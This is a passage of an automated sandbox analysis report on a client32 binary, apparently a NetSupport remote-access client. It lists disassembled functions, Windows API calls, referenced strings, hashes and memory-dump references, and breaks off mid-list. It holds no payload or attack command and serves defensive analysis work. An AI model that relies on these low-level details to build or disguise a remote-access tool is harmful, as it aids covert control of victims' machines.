                                                                                  • Opcode Fuzzy Hash: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
                                                                                  • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                  Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                  • __strdup.LIBCMT ref: 11145277
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                    • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                  • _free.LIBCMT ref: 111452AC
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 398584587-0
                                                                                  • Opcode ID: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
                                                                                  • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                  • Opcode Fuzzy Hash: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
                                                                                  • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                  Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                    • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                  • _free.LIBCMT ref: 1100EE64
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • _free.LIBCMT ref: 1100EE77
                                                                                  • _free.LIBCMT ref: 1100EE8A
                                                                                  • _free.LIBCMT ref: 1100EE9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                  • String ID:
                                                                                  • API String ID: 3515823920-0
                                                                                  • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                  • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                  • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                  • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                  Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                    • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                    • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                  • wsprintfA.USER32 ref: 1114650E
                                                                                  • wsprintfA.USER32 ref: 11146524
                                                                                    • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76938400,?), ref: 11143E97
                                                                                    • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                    • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                  • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                  • API String ID: 3779116287-2600120591
                                                                                  • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                  • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                  • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                  • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                  Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                                  • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                                  • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                                  • CoUninitialize.OLE32 ref: 110F4BE6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 3550192930-0
                                                                                  • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                  • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                  • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                  • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                  Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76938400,?), ref: 11143E97
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile$CloseHandle
                                                                                  • String ID: "
                                                                                  • API String ID: 1443461169-123907689
                                                                                  • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                  • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                  • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                  • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                  Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,50D94AA1,76232EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                    • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                  • String ID: Client$DisableGeolocation
                                                                                  • API String ID: 3315423714-4166767992
                                                                                  • Opcode ID: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
                                                                                  • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                  • Opcode Fuzzy Hash: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
                                                                                  • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                  Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                    • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76933760,00000000,7694A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                    • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                    • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                    • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                  • TranslateMessage.USER32(?), ref: 11027850
                                                                                  • DispatchMessageA.USER32(?), ref: 11027856
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                  • String ID: Exit Msgloop, quit=%d
                                                                                  • API String ID: 3212272093-2210386016
                                                                                  • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                  • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                  • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                  • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                  Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 110179ED
                                                                                    • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
                                                                                    • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                    • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                    • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
                                                                                    • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
                                                                                    • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                    • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                    • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
                                                                                  • SetEvent.KERNEL32(00000324), ref: 11017A0D
                                                                                  • GetTickCount.KERNEL32 ref: 11017A13
                                                                                  Strings
                                                                                  • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                  • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                  • API String ID: 3804766296-4122679463
                                                                                  • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                  • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                  • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                  • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                  Function 6F9F4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6F9F4FC4
                                                                                  • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6F9F8E0D,00000000,?,6F9F8E0D,00000000,?,00000FA0,?), ref: 6F9F4FE4
                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,6F9F8E0D,00000000,?,00000FA0,?), ref: 6F9F4FED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                  • String ID: EnumProcessModules
                                                                                  • API String ID: 3858832252-3735562946
                                                                                  • Opcode ID: 04c6aeafda4e3225e111982057756ad841287f96dda597d15899ee2fd594f7f0
                                                                                  • Instruction ID: c430040d88da353d52cafbdf32830463e5db7761fac9914aa1c8a90b3a5eccf3
                                                                                  • Opcode Fuzzy Hash: 04c6aeafda4e3225e111982057756ad841287f96dda597d15899ee2fd594f7f0
                                                                                  • Instruction Fuzzy Hash: 0BF03472A04628AFC720DEA9D844E9B77A8BB48721F00C81AF95AD7640C674E811CFA0
                                                                                  Function 6F9F5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6F9F5014
                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F5034
                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F503D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
